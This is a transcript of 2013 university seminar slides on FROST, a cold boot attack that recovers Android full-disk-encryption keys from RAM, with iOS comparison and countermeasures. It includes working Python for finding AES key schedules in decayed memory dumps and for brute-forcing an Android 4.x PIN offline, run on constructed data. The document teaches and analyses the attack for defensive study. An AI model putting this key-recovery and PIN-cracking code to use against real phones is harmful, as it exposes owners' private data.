Forensic Recovery of Scrambled Telephones. Dai Yang, Proseminar: Network Hacking and Defence WS2013, Advisor: Tsvetko Tsvetkov. Chair for Network Architectures and Services, Faculty of Computer Science, Technical University Munich. December 13th, 2013.


DESCRIPTION

Performing a cold boot attack against the full disk encryption of Android and iOS.

TRANSCRIPT

Page 1

Chair for Network Architectures and Services, Faculty of Computer Science, Technical University Munich

Forensic Recovery of Scrambled Telephones

Dai Yang

Proseminar: Network Hacking and Defence WS2013

Advisor: Tsvetko Tsvetkov

December 13th, 2013

Page 2

Slide header (repeated on every page): FROST | Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Contents

Introduction: Meaning of Smartphones

Background

Android

Full Disk Encryption

Cold Boot Attack

Forensic Recovery of Scrambled Telephones

Vulnerability of iOS and Countermeasure

Conclusion

References

Page 3

Introduction

Almost every second person in Germany has a smartphone.

Smartphones are widely used, both privately and for business.

There is little awareness of how much personal data they hold.

Source: 2013 comScore MobiLens, data evaluated with Statista; numbers in millions.

Page 4

Background

Page 5

Android

Google launched Android as an open-standard mobile OS (Open Handset Alliance); the first device was the T-Mobile G1 in 2008.

Linux-kernel-based architecture, bottom to top:

Linux kernel (drivers, power manager, etc.)

Libraries (SQLite, WebKit, SSL, OpenGL, etc.)

Android Runtime (core libraries and the Dalvik VM; since "KitKat" (4.4): ART)

Application framework (Activity Manager, Window Manager, etc.)

Native applications (Home, Contacts, etc.)

Security features of modern versions:

since 4.0: full disk encryption (FDE) of the user-data partition via dm-crypt

since 4.3: Security-Enhanced Linux (SELinux)

pattern lock or PIN

separate user-data partition

all of this is weaker on "rooted" devices

Source: http://www.gsmarena.com/t_mobile_g1-pictures-2533.php, last visited 2013/11/17 at 16:18

Page 6

Full Disk Encryption

Techniques: dm-crypt (Linux), FileVault (Apple), BitLocker (Microsoft)

AES algorithm

Hardware based: e.g. crypto cellphone

Pros:

Transparent to applications and users

Swap space and temporary files are covered as well

Independent of the user: no per-file decisions

Immediate data destruction: discard the key and everything is gone

Cons:

Vulnerable to cold boot attacks (CBA)

Side-channel attacks

Cryptanalysis

A single key protects everything

Unencrypted (and therefore unsafe) boot region

Page 7

Software-based Full Disk Encryption

Page 8

Cold Boot Attack

a.k.a. platform reset attack, cold ghosting attack, iceman attack

Side-channel attack that exploits DRAM remanence; requires physical access

Target: the encryption keys that the running system holds in RAM

How to:

Press reset (cold boot), so the OS gets no chance to clear RAM on shutdown

Boot a small custom image (e.g. from USB) instead of the installed OS

Dump the memory

Alternative:

Dump RAM via the JTAG port

Transplant the memory modules into another computer and dump them there

Source: based on [6], FROST, FAU Erlangen-Nuremberg, Oct. 2012

Figure: remanence of RAM contents as a function of time without power, bit-error rate and temperature; cooling the chips slows the decay (chart not reproduced in the transcript).

Page 9

FROST

Page 10

Forensic Recovery of Scrambled Telephones

Page 11

Functionality of FROST

In general:

Check the encryption state

Key recovery (search the RAM dump for AES keys)

RAM dump via USB

Crack a 4-digit PIN

If the bootloader is unlocked / developer mode is enabled, additionally:

Decrypt and mount /data

Source: FROST user interface, http://www1.informatik.uni-erlangen.de/frost, last visited 2013/11/17 at 21:38
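The "key recovery" step above is the part of the cold boot attack that turns a raw RAM dump into a usable dm-crypt key. The following is an added example written for this transcript, not FROST's own code: it implements the key-schedule search from Halderman et al. [5] that FROST [6] reuses for AES-128. A key in RAM is almost always accompanied by its expanded key schedule (176 bytes for AES-128), so every 16-byte window of the dump is treated as a candidate key, expanded, and compared with the 160 bytes that follow it; bits that decayed during the cold boot are tolerated up to a Hamming-distance budget. The RAM image, the offset and the number of decayed bits are constructed inside the block, and decay is modelled as bits falling to 0. Bits flipped inside the 16 key bytes themselves are not corrected here; that needs the full reconstruction algorithm of [5].

```python
"""Recover an AES-128 key from a RAM image by key-schedule consistency.

Constructed example, not FROST's code. The RAM image is generated, not dumped.
"""
import random


def build_sbox():
    """Generate the AES S-box (GF(2^8) inverse followed by the affine map)
    instead of embedding the 256-byte table."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3 (a generator)
        q = (q ^ (q << 1)) & 0xFF                                # q /= 3, so q == 1/p
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        rotl = lambda v, s: ((v << s) | (v >> (8 - s))) & 0xFF
        sbox[p] = q ^ rotl(q, 1) ^ rotl(q, 2) ^ rotl(q, 3) ^ rotl(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63                                               # 0 has no inverse
    return sbox


SBOX = build_sbox()


def expand_key_128(key, rounds=10):
    """Return the (rounds + 1) * 16-byte AES-128 key schedule of a 16-byte key."""
    w = list(key)
    rcon = 0x01
    for i in range(4, 4 * (rounds + 1)):
        t = w[(i - 1) * 4:i * 4]
        if i % 4 == 0:                       # RotWord, SubWord, Rcon on every 4th word
            t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
            rcon = (rcon << 1) ^ (0x11B if rcon & 0x80 else 0)
        w += [a ^ b for a, b in zip(w[(i - 4) * 4:(i - 3) * 4], t)]
    return bytes(w)


def hamming(a, b):
    """Number of differing bits between two equal-length byte strings."""
    return bin(int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).count("1")


def find_aes128_keys(image, max_bit_errors=16):
    """Scan every byte offset of `image`; return [(offset, key, bit_errors)] for
    windows whose next 160 bytes match the expansion of the window within budget."""
    hits = []
    for off in range(len(image) - 176 + 1):
        key = image[off:off + 16]
        # Cheap filter: compare only round key 1 before doing the full expansion.
        if hamming(expand_key_128(key, rounds=1)[16:], image[off + 16:off + 32]) > max_bit_errors:
            continue
        errors = hamming(expand_key_128(key)[16:], image[off + 16:off + 176])
        if errors <= max_bit_errors:
            hits.append((off, key, errors))
    return hits


def make_test_image(key, offset, flips, size=8192, seed=1):
    """Constructed RAM image: random filler, the schedule of `key` at `offset`, and
    `flips` bits cleared inside the round keys to mimic DRAM decay (modelled here
    as cells falling back to 0; real ground states depend on the chip)."""
    rng = random.Random(seed)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[offset:offset + 176] = expand_key_128(key)
    for _ in range(flips):
        pos = offset + 16 + rng.randrange(160)
        buf[pos] &= 0xFF ^ (1 << rng.randrange(8))
    return bytes(buf)


if __name__ == "__main__":
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 sample key
    image = make_test_image(key, offset=4321, flips=12)
    for off, k, errs in find_aes128_keys(image):
        print(f"key {k.hex()} at offset {off:#x}, {errs} decayed bits")
```

The error budget is what makes this work on a real dump: a few seconds without power already flip bits, and the budget of 16 bits out of 1280 rejects random data (which differs in about half of its bits) while still accepting a schedule that has started to decay. A window that is itself a later round key passes the cheap filter (its expansion differs from the next round key only in the round constant) but fails the full comparison, so only the true key is reported.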

Page 12

Results from FROST

The RAM dump contains a wealth of very sensitive information, for example:

Personal photos, old and new (from the Dropbox app)

Recently visited websites

E-mails

The entire WhatsApp chat history

Personal text files

Contacts

Calendar entries

WiFi credentials in plain text

Other personal plain-text files

Other plain-text credentials

GPS coordinates

List of recent phone calls

etc.

Page 13

Evaluation

Page 14

Vulnerability of iOS and Countermeasures

iOS is (almost) not vulnerable to the cold boot attack:

keys are wiped from RAM when they are no longer needed

the AES key is derived from the device's hardware UID key entangled with the user passcode; the UID is fused into the crypto engine and not readable by software, so guessing has to run on the device itself

high iteration count: each passcode attempt is deliberately slow

GUI protection (escalating delays after wrong passcodes) and optional wipe after too many failures

Since iOS 7 and the iPhone 5S: Touch ID fingerprint in addition to the passcode

Countermeasures in general:

cache- or register-based key storage, so the key never sits in RAM

memory soldered to the board (no removal and transplant)

key wipe when the device locks

memory wipe at boot

two-factor authentication

full memory encryption
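Two passages above hinge on the same arithmetic: FROST's "crack a 4-digit PIN" feature on page 11, and the "high iteration count" plus UID entanglement that keep iOS out of reach on this page. The following added example, written for this transcript and not FROST's, Android's or Apple's code, reproduces the key derivation of Android 4.0-4.3 vold/cryptfs (PBKDF2-HMAC-SHA1, 2000 iterations, 16-byte salt from the crypto footer, 32 bytes of output used as AES key and IV for the wrapped master key) and runs the 10^4 PIN guesses off-device. The salt, the "true" PIN and the oracle are constructed: real tooling decides whether a candidate is right by AES-128-CBC-decrypting the wrapped master key and checking that the first sector of /data then decrypts to an ext4 superblock, which this block leaves to a caller-supplied function so it runs without a disk image.

```python
"""Cost of guessing a 4-digit PIN against Android 4.x FDE, off-device.

Constructed example. Derivation parameters follow AOSP cryptfs for Android 4.0-4.3;
the salt, the true PIN and the oracle are made up for the demo.
"""
import hashlib
import itertools
import time

ANDROID_ITERATIONS = 2000   # HASH_COUNT in cryptfs.c of Android 4.0-4.3
KEY_LEN = 16                # AES-128 key that unwraps the master key
IV_LEN = 16                 # CBC IV for that unwrap


def derive_kek(pin, salt, iterations=ANDROID_ITERATIONS):
    """Derive (key, iv) from a PIN the way Android 4.x vold does."""
    out = hashlib.pbkdf2_hmac("sha1", pin.encode(), salt, iterations, KEY_LEN + IV_LEN)
    return out[:KEY_LEN], out[KEY_LEN:]


def pin_candidates(digits=4):
    """All numeric PINs of the given length, in counting order."""
    for tup in itertools.product("0123456789", repeat=digits):
        yield "".join(tup)


def brute_force_pin(oracle, salt, digits=4, iterations=ANDROID_ITERATIONS):
    """Try every PIN; `oracle(key, iv)` returns True when the candidate unwraps the
    master key (decrypt-and-check against the footer and /data in real tooling).
    Returns (pin, guesses) or (None, 10**digits) if nothing matched."""
    for tried, pin in enumerate(pin_candidates(digits), start=1):
        if oracle(*derive_kek(pin, salt, iterations)):
            return pin, tried
    return None, 10 ** digits


def seconds_to_exhaust(digits, iterations, sample=20):
    """Time `sample` derivations and extrapolate to the full PIN space. Nothing in
    the derivation is tied to the phone's hardware, so this runs on any machine;
    that portability is exactly what iOS's fused UID key removes."""
    salt = bytes(16)
    t0 = time.perf_counter()
    for pin in itertools.islice(pin_candidates(digits), sample):
        derive_kek(pin, salt, iterations)
    return (time.perf_counter() - t0) / sample * 10 ** digits


def demo(true_pin="2013", salt=bytes(range(16))):
    """Constructed scenario: the oracle compares against the true PIN's derived
    key, standing in for the decrypt-and-check step of a real cracker."""
    expected = derive_kek(true_pin, salt)
    oracle = lambda key, iv: (key, iv) == expected
    return brute_force_pin(oracle, salt)


if __name__ == "__main__":
    pin, tried = demo()
    print(f"PIN {pin} found after {tried} guesses")
    print(f"4-digit PIN at Android's 2000 iterations: ~{seconds_to_exhaust(4, 2000):.1f} s off-device")
    # Apple calibrates its passcode derivation to about 80 ms per attempt on the
    # device [7]; with the UID fused into hardware, all 10^4 guesses must run there.
    print(f"4-digit passcode at 80 ms per on-device attempt: ~{0.08 * 10 ** 4 / 60:.0f} min")
```

Two things follow from running it. First, 2000 PBKDF2 iterations cost a few milliseconds per guess on a laptop, so a 4-digit PIN falls in seconds once the crypto footer and the first sector of /data are in hand; the PIN protects the master key only against someone who cannot copy the flash. Second, the same 10^4 guesses against iOS cannot leave the phone, because the derivation mixes in the UID that software cannot read, and Apple's calibration to roughly 80 ms per attempt [7] turns the search into minutes on the device, where the escalating delays and the wipe-after-failures policy also apply.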

Page 15

Conclusion

Page 16

Questions

Page 17

References

[1] "Global market share held by tablet operating systems in 2013", survey by IDC, via Statista, March 2013.

[2] "Android technical specs", Open Handset Alliance, http://source.android.com/devices/tech/, last visited 2013/11/17 at 16:33.

[3] "Linux kernel device-mapper crypto target", DMCrypt, https://code.google.com/p/cryptsetup/wiki/DMCrypt, last visited 2013/11/17 at 17:47.

[4] R. Carbone, C. Bean, M. Salois, "An in-depth analysis of the cold boot attack", Defence R&D Canada, Department of National Defence, Jan. 2011.

[5] J. A. Halderman, S. D. Schoen, N. Heninger, W. Clarkson, W. Paul, J. A. Calandrino, A. J. Feldman, J. Appelbaum, E. W. Felten, "Lest We Remember: Cold Boot Attacks on Encryption Keys", Proceedings of the 17th USENIX Security Symposium, USENIX Association, 2008, pp. 45-60.

[6] T. Müller, M. Spreitzenbarth, F. C. Freiling, "Forensic Recovery of Scrambled Telephones", FAU Erlangen-Nuremberg, Oct. 2012.

[7] Apple Inc., "iOS Security", whitepaper, http://www.apple.com/ipad/business/docs/iOS_Security_Oct12.pdf, last visited 2013/11/20 at 11:56.

Page 18

Forensic Recovery of Scrambled Telephones

Dai Yang, Proseminar: Network Hacking and Defence WS2013, Instructor: Tsvetko Tsvetkov, Chair for Network Architectures and Services, Faculty of Computer Science, Technical University Munich, December 13th, 2013